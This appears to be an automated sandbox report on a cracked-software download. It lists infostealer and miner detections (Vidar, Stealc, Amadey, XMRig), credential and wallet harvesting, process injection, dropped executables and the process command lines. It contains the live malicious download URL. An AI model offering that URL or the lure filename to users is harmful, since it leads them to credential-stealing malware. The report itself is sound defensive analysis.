Analysis Overview
Threat Level: Known bad
The file https://yodgxd060624l18.xyz/233d788293f695acc5b1665af5fbd41f4c800440_1718387358/file-dln_666c829edcecf/?source=12&grp=17&file=&q=Bandicam-7-1-1-2158-with-Crack--RePack---Portable- was found to be: Known bad.
Malicious Activity Summary
Stealc
xmrig
Vidar
Detect Vidar Stealer
Amadey
XMRig Miner payload
Downloads MZ/PE file
Blocklisted process makes network request
Reads user/profile data of local email clients
Loads dropped DLL
Executes dropped EXE
Reads data files stored by FTP clients
Registers COM server for autorun
Reads user/profile data of web browsers
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 17:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 17:58
Reported
2024-06-14 18:08
Platform
win10-20240404-en
Max time kernel
599s
Max time network
597s
Command Line
Signatures
Amadey
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Vidar
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | N/A |
| N/A | N/A | C:\ProgramData\DGIJEGHDAE.exe | N/A |
| N/A | N/A | C:\ProgramData\HJJJECFIEC.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | href.li | N/A | N/A |
| N/A | href.li | N/A | N/A |
| N/A | href.li | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1260 set thread context of 3320 | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 2220 set thread context of 3724 | N/A | C:\ProgramData\DGIJEGHDAE.exe | C:\Windows\SysWOW64\ftp.exe |
| PID 3460 set thread context of 2884 | N/A | C:\ProgramData\HJJJECFIEC.exe | C:\Windows\SysWOW64\ftp.exe |
| PID 2884 set thread context of 2856 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 2856 set thread context of 2820 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\descript.ion | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\History.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\si.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hy.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ja.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nb.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\th.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628615154628920" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\DGIJEGHDAE.exe | N/A |
| N/A | N/A | C:\ProgramData\HJJJECFIEC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://yodgxd060624l18.xyz/233d788293f695acc5b1665af5fbd41f4c800440_1718387358/file-dln_666c829edcecf/?source=12&grp=17&file=&q=Bandicam-7-1-1-2158-with-Crack--RePack---Portable-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaa09f9758,0x7ffaa09f9768,0x7ffaa09f9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2924 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5144 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5296 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2bc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5508 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3016 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5808 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5716 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3620 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1700 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5432 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
